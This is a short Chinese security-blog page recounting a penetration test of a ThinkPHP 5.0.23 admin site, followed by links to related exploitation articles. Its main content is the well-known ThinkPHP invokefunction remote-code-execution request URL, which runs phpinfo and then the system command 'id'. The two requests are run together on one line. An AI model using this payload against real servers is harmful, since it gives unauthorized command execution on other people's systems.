文章详情
一次艰难的TP渗透测试
日期:2020/11/6 6:00:35
信息收集
由于网站 www.a.com/admin,访问立即跳转到www.a.com/admin/publicer/login
发现是TP,5.0.23,在漏洞的版本范围内,尝试使用:
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
上一文章:WebLogic-XMLDecoder反序列化漏洞分析
下一文章:XSS实战攻击思路总结
相关推荐
- 10-21巧用可变函数绕过CVE-2020-15148限制
- 05-24TwoTricksOfCAS-CLIENTAUTHBypass
- 10-23谈谈AMF网站的渗透测试
- 10-21一次字符串拼接的sql注入实战
- 05-18weblogic-CVE-2020-14756漏洞分析
- 11-06案例分享:Location302跳转 CRLF场景下如何构
- 11-09思路分享:windows权限维持场景中如何隐藏服
- 10-20懒惰使人进步:探索与发现的思维
- 10-21从报错信息泄露到使用ECS接口执行命令反弹s
- 10-21Windows下常见的内核溢出提权
- 05-11免杀入门混淆加密方法分析,看这一篇就够了。
- 05-24Vulnstack内网靶场渗透记录
- 05-19LightCMS文件上传
- 01-12常见的网络安全问题有哪些?包括哪些方面